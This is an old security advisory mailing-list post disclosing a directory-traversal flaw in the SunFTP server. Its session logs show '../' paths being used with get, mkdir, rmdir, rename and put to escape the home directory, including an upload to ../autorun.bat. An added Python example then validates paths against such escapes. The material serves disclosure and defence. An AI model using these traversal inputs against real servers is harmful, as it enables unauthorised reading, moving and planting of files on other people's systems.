Date: Fri, 2 Mar 2001 12:14:23 -0000
From: [email protected]
To: [email protected]
Subject: Sunftp build9(1) - ftp server Vulnerability
It is possible to break out of the root directory by using relative paths.
e:\crap was used as the home directory of user test.
#the get command#
Getting files from outside of the root directory:
220 chris FTP Server (SunFTP b9) ready on port 21...
Benutzer (10.17.3.44:(none)): test
331 Password required for test.
Kennwort:
230 User test logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 test.txt
226 File sent ok
FTP: 179 Bytes empfangen in 0,00Sekunden 179000,00KB/s
ftp> cd ..
501 CWD failed. No permission
ftp> get ../sunftptest.txt
200 Port command successful.
150 Opening data connection for ../sunftptest.txt.
226 File sent ok
FTP: 1443 Bytes empfangen in 0,00Sekunden 1443000,00KB/s
#the mkdir command#
Without privileges to create directories:
ftp> mkdir test
550 '/test': can't create directory.
ftp> mkdir ../test
257 '/../test': directory created.
Hell! It's getting worse...
#the rmdir command#
Without any privileges to remove anything:
ftp> rmdir ../test
250 '/../test': directory removed.
This only works with empty directories.
#the rename command#
It is possible to rename files outside of the root directory without
permissions. And it is also possible to move files with the rename command,
when the filename is known.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
226 File sent ok
FTP: 240 Bytes empfangen in 0,00Sekunden 240000,00KB/s
ftp> cd ..
501 CWD failed. No permission
ftp> rename ../sunftptest.txt movedtohomedir.txt
350 File exists, ready for destination name.
250 File '/../sunftptest.txt' renamed to '/movedtohomedir.txt'.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt
226 File sent ok
FTP: 314 Bytes empfangen in 0,00Sekunden 314000,00KB/s
#the put command#
If you have permission to upload files, you can put these files outside of
the homedir.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt
226 File sent ok
FTP: 314 Bytes empfangen in 0,00Sekunden 314000,00KB/s
ftp> put
Lokale Datei c:\test.txt
Remotedatei test.txt
200 Port command successful.
150 Opening data connection for test.txt.
226 File received ok
ftp> put
Lokale Datei c:\test.txt
Remotedatei ../autorun.bat
200 Port command successful.
150 Opening data connection for ../autorun.bat.
226 File received ok
Solution
No quick bugfix. Use with care.
I tried to contact the authors, but their webpage
seems to be down.
[email protected] or
[email protected]
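
The sessions above show CWD refusing ".." while get, mkdir, rmdir, rename and put accept it, so the check evidently is not shared between commands. The following is an added example, not part of the original post and not SunFTP code: one resolver that every path-taking command goes through. The names resolve_in_root, vet and PathEscape are hypothetical; the wire verbs are the standard FTP commands behind the client commands used above.

```python
import ntpath  # Windows path rules, usable on any host OS

ROOT = r"e:\crap"  # home directory of user "test", as in the advisory
# FTP wire verbs sent for cd, get, put, mkdir, rmdir, rename and delete
PATH_COMMANDS = {"CWD", "RETR", "STOR", "MKD", "RMD", "RNFR", "RNTO", "DELE"}

class PathEscape(Exception):
    """Client-supplied path resolves outside the home directory."""

def resolve_in_root(root, cwd, arg):
    """Map a client path to a real path under root, or raise PathEscape."""
    arg = arg.replace("\\", "/")        # treat both separators alike
    if ":" in arg:                      # drive letters, alternate data streams
        raise PathEscape(arg)
    virtual = arg if arg.startswith("/") else cwd.rstrip("/") + "/" + arg
    parts = []
    for seg in virtual.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not parts:               # ".." at the virtual root: refuse
                raise PathEscape(arg)
            parts.pop()
        else:
            parts.append(seg)
    real = ntpath.normpath(ntpath.join(root, *parts))
    # Second, independent containment check on the final real path.
    base = ntpath.normcase(ntpath.normpath(root))
    low = ntpath.normcase(real)
    if low != base and not low.startswith(base + "\\"):
        raise PathEscape(arg)
    return real

def vet(root, cwd, line):
    """Real path for one path-taking command line, or None if refused."""
    verb, _, arg = line.strip().partition(" ")
    if verb.upper() not in PATH_COMMANDS:
        raise ValueError("not a path-taking command: " + verb)
    try:
        return resolve_in_root(root, cwd, arg.strip())
    except PathEscape:
        return None

# Constructed sample: the advisory's paths expressed as wire commands.
SAMPLE = ["RETR ../sunftptest.txt", "MKD ../test", "RMD ../test",
          "RNFR ../sunftptest.txt", "STOR ../autorun.bat", "STOR test.txt"]

if __name__ == "__main__":
    for line in SAMPLE:
        print(line, "->", vet(ROOT, "/", line))
```

The purely lexical check assumes the home directory contains no links or junctions pointing elsewhere; a server that allows those must also compare the fully resolved on-disk path.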